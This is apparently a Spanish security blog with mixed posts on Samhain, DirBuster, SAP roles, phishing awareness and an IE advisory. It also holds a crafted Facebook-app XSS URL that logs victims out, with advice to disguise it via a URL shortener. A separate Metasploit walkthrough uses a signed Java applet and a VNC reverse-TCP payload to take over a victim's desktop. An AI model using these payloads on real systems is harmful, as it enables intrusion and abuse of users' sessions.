Rincón Informático

The Samhain host-based intrusion detection system (HIDS) provides file integrity checking and log file monitoring/analysis, as well as rootkit detection, port monitoring, detection of rogue SUID executables, and hidden processes. (http://www.la-samhna.de/samhain/index.html)

Samhain es un sistema de  verificación de integridad de archivos  y alerta de intrusión para hosts individuales o redes basadas en Unix, distribuido bajo los términos de la GNU General  Public Licence.

Básicamente lo que hace es crear una base de datos con la información  relevante (permisos, fecha de creación, usuario , grupo. etc. ) de los archivos que se encuentran en los directorios que le indiquemos, luego revisa periódicamente  si alguno de los archivos fue modificado y notifica.

Instalación

-Obtenemos Samhain:

$wget http://la-samhna.de/samhain/samhain-current.tar.gz

- Compilamos e instalamos:

La configuración estándar de Samhain  es válida para el propósito de esta entrada. Para ver todas  las opciones de configuración  ejecutar:  ./configure – -help. Recomiendo - -with-kcheck=/path/to/System.map para habilitar la detección de rootkits.

$ ./configure
$ make
# make install

Instalación gráfica

$ ./Install.sh

Después de la instalación

- Iniciar la base de datos
$ samhain -t init

- Correr samhain como demonio

$ samhain -t check -D

Por defecto, la ruta y el nombre del archivo de configuración es:  /etc/samhainrc
Configurarlo  no es muy complicado  si se tiene a mano la documentación: http://www.la-samhna.de/samhain/manual/ , como dije anteriormente la configuración por defecto es funcional y se sale del propósito del post explicarla detalladamente.

- Es posible utilizar samhain con nagios: http://www.la-samhna.de/samhain/manual/nagios.html

-El proyecto Beltane sirve de consola web para samhain  (vista gráfica de notificaciones).

Dirbuster es una herramienta desarrollada en JAVA que nos permite encontrar aquellos directorios y archivos que  se encuentren en los servidores WEB y que no tengan los permisos asignados correctamente,  haciendo uso de la tan famosa tecnica “FUERZA BRUTA”.  Aunque esta tecnica  usada por dirbuster no es nueva (ya que existen algunos programas similares, como nikto), hay algunas caracteristicas que hacen a Dirbuster una interesante herramienta:

• Multiproceso ( en las pruebas de hasta 6000 peticiones por segundo)
• soporte https
• capaz de escanear más profundo en los directorios que encuentre
• También puede trabajar en modo de fuerza bruta con diccionario
• encabezados HTTP personalizad
• análisis de contenido cuando las solicitudes no vienen con una respuesta de 200 de cabecera
• extensión de archivo personalizado
• la configuración de rendimiento puede ser modificada mientras el programa se está ejecutando
• básica, implícita y admite la autenticación NTLM
• La interfaz GUI

Pueden descargar la aplicacion desde aca.

Despues de haberlo descargado, y extraido, lo podemos ejecutar de la siguiente forma (cabe resaltar que se necesita JAVA).

cd DirBuster-0.12
java -jar DirBuster-0.12.jar

si todo ha salido bien, aparecera la GUI de la aplicacion:

Ahora  digitamos la url del objetivo e igualmente seleccionamos los parametros que nosotros deseemos, como el metodo ya sea get, head o ambos. Escogemos uno  de los diccionarios que trae la aplicacion, ajustamos algunos parametros adicionales y por ultimo damos click en start.

Inmediatamente saldra una nueva pantalla con todos los resultados que va obteniendo la aplicacion.  Como ven es muy sencillo  manejar la aplicacion, y da magnificos resultados, la recomiendo!.

Por estos días aprovechando el tiempo libre, he estado investigando sobre los ataques  (Cross-site scripting) XSS en algunas aplicaciones sobre Facebook. En el blog Desvaríos informáticos en un post publicado hace más de un año hacen una demostración de como incrustar código javascript en una aplicación vulnerable, en el ejemplo al hacer click en un link se abre un alert donde nos muestra las cookies de la página, completamente inofensivo, pero que nos hace pensar en muchas cosas que se pueden hacer con esa información. Aquí esta dicho post  http://rooibo.wordpress.com/2009/04/28/agujero-de-seguridad-en-facebook/.

Con base en el ejemplo de Desvaríos informáticos he preparado una URL donde al hacer click en un link se cerrará la sesión del Facebook de la victima.

Hace menos de cuatro días la forma de cerrar nuestra sesión era haciendo click en un botón Salir con una Url mas o menos así:

http://www.facebook.com/logout.php?h=21ed5705a23da92010c2a3scebs3d&t=27955277&ref=mb

Es decir enviándole los parámetros h, t y ref a la página logout.php de esta forma se “garantizaría” que el usuario al cual pertenece la cookie h fue quien presionó el link de Salida, además evitando por ejemplo: si se redirecciona la victima al script http://www.facebook.com/logout.php no cerraría la sesión  del usuario ya que no tiene parametros validos.

Entonces para lograr nuestro propósito que es cerrar la sesión de la victima tendríamos que atravesar el Dom de la página coger ese link y redireccionar a ese link nuestra victima; hice varias bromas así pero luego me di cuenta que habían cambiado la forma de cerrar sesión :S ya no se utilizaba un link sino un formulario que al enviarse le pasa los parámetros de validación al script logout.php claro ya no con el método GET sino con POST. El form es algo como esto:

<form id=”logout_form” method=”post” action=”/logout.php”><input type=”hidden” autocomplete=”off” name=”post_form_id” value=”be875b2cfe5803f1bfc2bafed8c719ee”></input><input type=”hidden” name=”fb_dtsg” value=”CQKDv” autocomplete=”off”></input><input type=”hidden” autocomplete=”off” name=”ref” value=”mb”></input><input type=”hidden” autocomplete=”off” name=”h” value=”0779d7c779f7c29bd254ea9a61d2cd52″></input><label><input type=”submit” value=”Salir”></input></label></form>

Las variables que se le pasan al script son las que están en negrita.

Entonces para cerrar sesión solo hay que darle enviar al formulario y cómo hago eso?

document.getElementById(‘logout_form’).submit()

como vemos ubicamos el Elemento form através de su Id “logout_form” y simplemente le aplicamos el método submit() que equivale a dar click en el botón Salir.

Esta es la url completa donde creamos un link “Responder Quíz” y lo ubicamos en cierta parte de la aplicación cargada, cuando la victima de click en dicho link se ejecuta la línea de código anterior haciendo un logout

http://apps.facebook.com/qeres-buen-pol-ceijh/?target=list&send_id=1517598431&x=24897%22%20href=%22%20javascript:document.getElementById(‘logout_form’).submit();%22%3E%3Ch1%20style=%22margin:%2050px%2050px%2050px%2050px;color:blue;position:absolute;left:200px;%22%3E%20Responder%20Qu%C3%ADz%20%3C/h1%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%22

Para que no sea tan sospechoso semejante link, como ya había mencionado nuestro amigo @Epsilon en una publicación Aquí , podemos aprovechar los acortadores de Url’s; esto ya es menos sospechoso:

http://tinyurl.com/26hnrzl

Si usamos un poco nuestra imaginación nos daremos cuenta que hay muchísimas formas de aprovechar esta vulnerabilidad.

Bueno ya con esto creo que es suficiente y espero que se haya entendido, ya que más importante que aprender a usar algo es comprender como funciona y crear nuevas cosas a partir de ese conocimiento.

Hasta la próxima!

En esta ocasion, se mostrara como de manera facil  y usando el Metasploit Framework  inyectaremos un servidor VNC en una maquina remota para poder visualizar el escritorio de la victima y hacer lo que deseemos.

Antes de entrar en materia debemos tener en cuenta que  el exito del exploit depende de varios factores  entre ellos tenemos:

• Antivirus de la maquina victima -> He hecho algunas pruebas y  el NOD32 detecta  el archivo como un troyano.
• JAVA -> Es necesario que la victima tenga instalado JAVA instalado
• Que la victima acepte el certificado.
• Un poco de suerte.

Para empezar debemos actualizar nuestro Metasploit:

msfupdate

El siguiente paso es correr la consola del metasploit:

msfconsole

Ahora seleccionamos el exploit  y asignamos los parametros necesarios:

use exploit/multi/browser/java_signed_applet
set payload windows/vncinject/reverse_tcp
set lhost 192.168.100.1 -> Ip local
lhost => 192.168.1.100
exploit

A continuacion debe salir algo como esto:

[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.2:4444
[*] Using URL: http://0.0.0.0:8080/dTkaem
[*]  Local IP: http://192.168.1.100:8080/dTkaem
[*] Server started.

El siguiente paso es hacer que nuestra victima haga click en el enlace malioso que el exploit a creado:

http://192.168.1.100:8080/dTkaem

Hay que tener en cuenta que esta es una direccion privada y que asi solo funcionara si nuestra victima esta en la misma red LAN. Si se desea hacer a traves de Internet se debe cambiar el enlace por la IP publica y asegurarse que  no haya algun dispositivo como router, firewall o demas que impidan el paso hacia el puerto 8080
Cuando la Victima haga click en el  enlace aparecera una advertencia como esta:

Si nuestra victima ejecuta la aplicacion, inmediatamente se nos abrira la pantalla del escritorio remoto donde podremos  ver lo que hace la victima en ese momento,   y hacer lo que nosotros queramos.

El ministro de Defensa de Colombia, Gabriel Silva, denunció el plan que unos piratas informáticos han trazado para sabotear el recuento de votos de las elecciones presidenciales del 30 de mayo, así como para atacar la estructura informática del país.

El ministro recordó que durante los comicios legislativos de marzo tuvo lugar un caos en los escrutinios y en la publicación de los resultados, atribuido a un ataque de expertos que lograron vulnerar la red de la Registraduría Nacional.

“En el mundo cibernético no hay fronteras y los intereses terroristas no tienen fronteras desafortunadamente cuando se trata de atacar al país también en su estructura informática”, dijo Silva en declaraciones a periodistas.

“Hemos detectado que hay esfuerzos de “delicuentes informaticos”‘ de otros países y en otras jurisdicciones que están buscando afectar no solo la Registraduría y el día de las elecciones, sino penetrar y afectar la seguridad informática del país”, precisó.

Los colombianos acudirán a las urnas el próximo 30 de mayo, en las que se prevé que serán las elecciones presidenciales más reñidas de la historia reciente del país.

Las autoridades electorales se comprometieron a publicar el 95 por ciento del recuento de los votos dos horas después del cierre de las urnas, al tiempo que han diseñado medidas de seguridad para evitar ataques informáticos.

“Van a intentar nuevamente tanto desde Colombia como desde el exterior afectar el normal desarrollo de la parte de sistemas del proceso electoral, pero estamos preparados, hemos aprendido la lección”, aseguró Silva.

Más de 29 millones de colombianos están habilitados para votar en los comicios presidenciales, de acuerdo con la Registraduría Nacional.

Fuente

Acabo de recibir un correo con un  claro intento de Phishing a una pagina de recargas on-line de la empresa de telefonia celular Movistar.  Este Phishing me  parecio muy interesante por su elaboracion (se ve que se tomaron el  trabajo de realizar algo bien hecho) y por su innovacion, a decir verdad es primera vez que veo una estafa de este tipo.  ¿Pero, que es el Phishing? Cito la wiki:

Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas cibernéticas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea^[1] o incluso utilizando también llamadas telefónicas.

Ahora que tenemos al definicion clara, debemos hacernos una pregunta interesante. ¿En particular como funciona este phishing a Movistar?

1. Te llega un mensaje al correo con este asunto: “RECARGA EN LINEA TU MOVISTAR Y OBTEN UNA TRIPICARGA MOVISTAR”.
2. Cabe resaltar que   gmail te advierte que el contenido de ese mensaje puede ser fraudulento, sin embargo, si haces caso omiso a la advertencia por parte de google,  al darle click a la imagen te envia a la siguiente direccion:

http://sitiosegurnomovistar.co.cc/sitio/recargas/

3. En esta url sale un pantallazo incial donde nos pregunta, el numero de celular, el valor a recargar y la entidad financiera de la cual se descontara el dinero. (Si somos un poco observadores, nos damos cuenta de que en este campo solo hay bancos Colombianos, lo cual significa y da entender que este Phishing fue desarrollado por personas Colombianas, aunque aclaro que no necesariamente debe ser asi)



4. En el siguiente pantallazo, nos pide  los datos de la tarjeta de credito o debito y otros datos confidenciales.



5. Por ultimo despues de ingresar los datos requeridos (sin importar si sean falsos o verdaderos), nos redirige al siguiente pantallazo.

¿Como podemos identificar este tipo de estafas?

1. Es obvio que una compañia como Movistar nunca va a tener un dominio de tipo .co.cc,  estos dominios son gratuitos,  y nunca una compañia va a utilizar estos dominios gratuitos. Por esta razon siempre visualicen las url y si ven dominios raros, comiencen a sospechar.
2. Identifiquen en la url el “HTTPS” ya que en todas estas transacciones de dinero se utiliza este protocolo con el fin de evitar algun tipo de estafa o robo, asi que  en todas aquellas paginas para comprar productos y servicios, deberian tener al inicio de la URL “HTTPS”.
3. Si en algun momento empiezan a sospechar de la pagina, usen el sentido comun, y solo por comprobar, ingresen datos erroneos  e incluso no ingresen nada, se sorprenderan como la pagina fraudulenta los dejara seguir sin ningun problema.
4. Por ultimo observer el captcha  el cual debe cambiar SIEMPRE que se refresque la imagen, si esto no ocurre, pienselo 2 veces a la hora de continuar.

Espero hayan comprendido un poco este tipo de ataque y no caigan en el mismo, evitese dolores de cabeza, recuerde que en la Internet siempre va haber alguien esperando  alguna oportunidad para robarle su dinero.  Publico este post, con el unico fin de darle a conocer a los usuarios esta nueva forma de phishing.

“She was more like a beauty queen from a movie scene”

Tengo que aceptar que esta canción me recuerda a Campus Party, las pocas veces que la escucho lo hago pero en la versión acústica que tiene Chris Cornell.  Por lo mismo os la recomiendo.

Antes que nada debo disculparme enormemente con las personas que nos leen puesto que llevo mucho tiempo sin escribir en RinconInformatico.NET y sin querer he terminado por acostumbrado a no hacerlo, y eso es un grave error de mi parte.

Hoy quiero hablar un poco de mi trabajo.

SAP como todo (¿Gran?) sistema de administración de empresas (ERP) maneja autorizaciones para los usuarios y esta es una buena parte de la seguridad como tal.  Como bien definida por la etimología de la palabra:

Autorización es la capacidad que se le otorga a un individuo para realizar una actividad.

Las autorizaciones en SAP se manejan por medio de ROLES y dentro de los roles encontramos los PERFILES, en estos perfiles de usuario se almacenan las AUTORIZACIONES y son estas las que configuramos por medio de OBJETOS de AUTORIZACION.

¿Claro?

Espero que sí.  Sin embargo y comenzando por lo pequeño… un objeto de autorización simplemente es un mecanismo usado para INSPECCIONAR los privilegios de un usuario para acceder a determinados datos o ejecutar determinados programas.

Es en los objetos de autorización donde se configuran las ACTIVIDADES permitidas a un usuario, para que modifique determinado campo o cambio una descripción:

Ejemplo 1:

El usuario A, desea cambiar la descripción de un material pues resulta que tiene un error gramatical, el objeto de autorización X controla las modificaciones sobre las descripciones en los textos de los materiales.  Por lo tanto el Usuario A debe tener a X en su ROL configurado de la manera adecuada para que le permita ejecutar el cambio.

¿Qué es un Rol?

El rol de un usuario es un contenedor de perfiles, y los perfiles a su vez (como antes lo indicábamos) son los que contienen a las autorizaciones, y estas son simplemente las configuraciones de los Objetos de autorización.  El Rol es lo que en las últimas versiones SAP a implementado con el fin de que la seguridad de accesos al sistema R/3 de SAP pueda ser administrada por una persona sin grandes conocimientos ni experiencia en este tipo de Sistemas de información.

¿Un usuario puede tener varios Roles?

Completamente, de hecho es lo recomendado para las cosas más genéricas, por ejemplo el permiso para imprimir.

¿Un Rol puede tener varios Perfiles?

No, solo hay un rol por perfil.

Entonces ¿Puede haber varias autorizaciones en un perfil?

Afirmativo.  Cada vez que ingresamos un objeto de autorización en un rol o perfil este crea una nueva autorización, con la configuración que se le de al objeto de autorización.

¿Puede darse ese caso?

Todo el tiempo:

Ejemplo 2:

El mismo usuario A quien tiene permiso de modificar descripciones de textos en los materiales de la empresa, NO debe tener acceso de modificación al rango de materiales 100-200 porque estos son materiales para pruebas de calidad y no es necesario, pero si debe tener acceso a la visualización de estos materiales.  Este tipo de permisos son administrados por el objeto Y el cual tiene la posibilidad de configurar la creación, modificación y la visualización sobre los materiales.  Lo que hace un administrador de accesos es agregar DOS objetos, uno que permita la modificación de los rangos que si tiene acceso y otro donde permita la visualización de todos los materiales.

En este caso tendríamos un Rol, un perfil, pero dos autorizaciones y por lo tanto dos objetos de autorización, iguales; pero de diferente configuración.

¿Puede llegar a ser complicado?

Mi experiencia me dice que sí.  Pues las recomendaciones de “los que saben” siempre es que los roles deben configurarse de manera GENERICA, por si alguien más requiere de estos permisos.  Sin embargo YO personalmente NO comparto esta teoría, puesto que la mayoría de las veces que se requiere restringir un acceso implica tener que modificar estos roles genéricos (Y lo que conlleva con ello, bien sea quitando acceso a TODOS lo que tengan dicho ROL u otorgando mas de los necesario a las mismos que tengan dicho rol) y terminar creando roles particulares.  Resultando en lo mismo que crear Roles particulares desde el principio.

Finalmente, los programas estándar de SAP tienen definida las peticiones de información a los roles de los usuarios, a nivel programacional, es decir, en ABAP la sentencia que verifica las autorizaciones es:

Donde “Z_TCODE” es el nombre del objeto de autorización, ID es el campo que controla y FIELD es la actividad que permitida el usuario.

Esta es una explicación a groso modo y para que la entiendan las personas que no manejan SAP todos los días.  En un futuro si lo creo necesario podemos hablar de cómo se realizan las autorizaciones, es decir, un manual donde veamos paso por paso como asignar permisos en los usuarios de un sistema R/3.  Por ahora no lo creo necesario, pero puede llegar el caso.

Así funciona la seguridad en los accesos de SAP, no es ni más ni menos.

Como hoy para mi persona es un día especial, quería compartir estos pensamientos de un personaje de película, en español es llamada como “Nada es para Siempre”, es la parte final de dicha Historia y dice así:

Claro, ya estoy muy viejo para pescar bien.

Casi siempre voy a pescar solo.  Aunque me dicen que no lo haga.

Pero a solas, en la media luz de la cañada…toda la existencia parece esfumarse y quedan mis recuerdos…y los rumores del río y el ritmo en compás de 4…y la esperanza de que muerdan.

A la larga todos los paisajes se funden…atravesados por un río.

El río se formó del gran diluvio…y corre sobre las piedras del tiempo.

Sobre algunas piedras, hay gotas eternas.

Bajo las piedras, están las palabras.

Y algunas de las palabras son suyas.

El río me consuela.

Artículo enteramente dedicado al Mejor de Todos Los Tiempos a mi Papá, a Don Germán.

El pasado Martes 9 de Marzo, Microsoft publicó un “Security Advisory (981374)”. La vulnerabilidad es un use-after-free (Referencia no valida a un puntero) la vulnerabilidad se encuentra en Iepeers.dll y sólo afecta a las versiones de Internet Explorer 6 y 7.

Es posible bajo determinadas condiciones para el puntero no válido, tener acceso después de que se haya eliminado un objeto. En un ataque, al tratar de acceder a un objeto liberado Internet Explorer puede permitir la ejecución remota de código.

Si un atacante explota esta vulnerabilidad podría obtener los mismos privilegios del usuario actualmente logueado en el computador. Así que a los usuarios de estas versiones de Internet Explorer se les recomineda que se actualicen a la version más reciente.

Para esta vulnerabilidad ya existe un exploit, la forma en que se puede explotar la vulnerabilidad la puede encontrar en esta PAGINA

Referencias

Microsoft Security Advisory

cve-2010-0806

Recientemente he recibido por medio de una lista de discusión sobre temas de seguridad, dos enlaces a libros que están públicos en la web, que tienen elementos de interés para los profesionales y estudiantes de la seguridad de la información. Espero sean de utilidad.

Libro 1 –> Security analysis And Data Visualization

Libro 2 –> Attack Simulation and Threat Modeling